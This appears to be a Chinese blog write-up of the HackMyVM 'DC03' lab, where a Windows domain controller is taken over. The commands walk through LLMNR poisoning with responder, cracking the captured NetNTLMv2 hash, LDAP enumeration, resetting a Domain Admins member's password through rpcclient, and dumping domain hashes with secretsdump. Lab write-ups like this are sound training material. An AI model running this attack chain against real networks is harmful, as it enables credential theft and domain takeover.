HackMyVM-DC03
|
88
|
0
|
|
HackMyVm

721 字
|
6 分钟

Box Info

OSWindows
DifficultyMedium

Nmap

[root@kali] /home/kali/Desktop  
❯ nmap 192.168.56.103 -sSV -Pn -A -T4

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-02 03:01:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:46:72:D1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 14h59m36s
| smb2-time: 
|   date: 2025-03-02T03:03:53
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:46:72:d1 (Oracle VirtualBox virtual NIC)

DC01.SOUPEDECODE.LOCAL添加到/etc/hosts

LLMNR & NBT-NS

我尝试直接枚举靶机上的信息,没有成功。

在做sherlocks的时候遇到过这个问题:Sherlocks-Reaper – HYH

这里是涉及到的一些文章

要说明的是,这个攻击不需要凭证,但是是有前提的

  • 无有效的 DNS: 当网络中缺乏有效的 DNS 服务器时,设备会尝试使用 LLMNR 或 NBT-NS 进行名称解析。这种情况下,攻击者可以更容易地利用这些协议进行攻击。
  • 启用的 LLMNR 和 NBT-NS: 目标主机必须启用 LLMNR 和 NBT-NS 服务。在许多 Windows 系统中,这些服务默认是启用的。
  • 同一广播域内: 攻击者和目标设备需要处于同一广播域内。LLMNR 和 NBT-NS 是基于广播的协议,因此攻击者需要能够接收到这些广播请求。
[root@kali] /home/kali/Desktop  
❯ responder -I eth0

成功接收到NTLM哈希值,直接使用john爆破

[root@kali] /home/kali/DC03  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jesuschrist      (xkate578)     
1g 0:00:00:00 DONE (2025-03-01 20:28) 100.0g/s 204800p/s 204800c/s 204800C/s 123456..lovers1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

SMBmap

进入到share目录,拿到user.txt

ldapdomaindump

LDAPDomainDump是一款利用LDAP协议收集活动目录信息的工具

[root@kali] /home/kali/DC03  
❯ ldapdomaindump -u "SOUPEDECODE.LOCAL\xkate578" -p jesuschrist 192.168.56.103                                                                            ⏎
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

然后使用python.http.server即可查看到html文件

可以看到Operators属于Domain Admins

而我们的用户属于Account Operators

还有一个用户属于Operator

因此目前要做的是,通过当前的xkate578用户去修改fbeth103的密码

[root@kali] /home/kali/DC03  
❯ rpcclient -U "xkate578" --password="jesuschrist"  192.168.56.126                                                                                        ⏎
rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!"
rpcclient $>

Secretdump

改好之后尝试获取域内的哈希,注意不是本地的!

[root@kali] /home/kali/DC03  
❯ impacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:Pass1234!'@192.168.56.126

Summary

UserLLMNR 中毒攻击获取到xkate578Net-NTLM Hash,并且在smb服务中拿到user.txt。这还是我第一次在渗透中使用LLMNR,之前还是在日志分析的时候了解的。

Root:通过ldap端口进行信息收集,这里我本想用的是bloodhound,但是老是报错。发现当前用户可以修改高权限组的成员密码,修改后dumphash,最后Evil-winrm登录。

其中重置了一下靶机,因此IP变化了。

当前页面链接: https://www.hyhforever.top/hackmyvm-dc03/
如果您对本文内容有所意见或者建议,欢迎评论。
HackMyVmWindows
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
密码保护:HackMyVM-Newbee

							
							

							
HackMyVm-easypwn

							
							

							
HackMyVm-DC02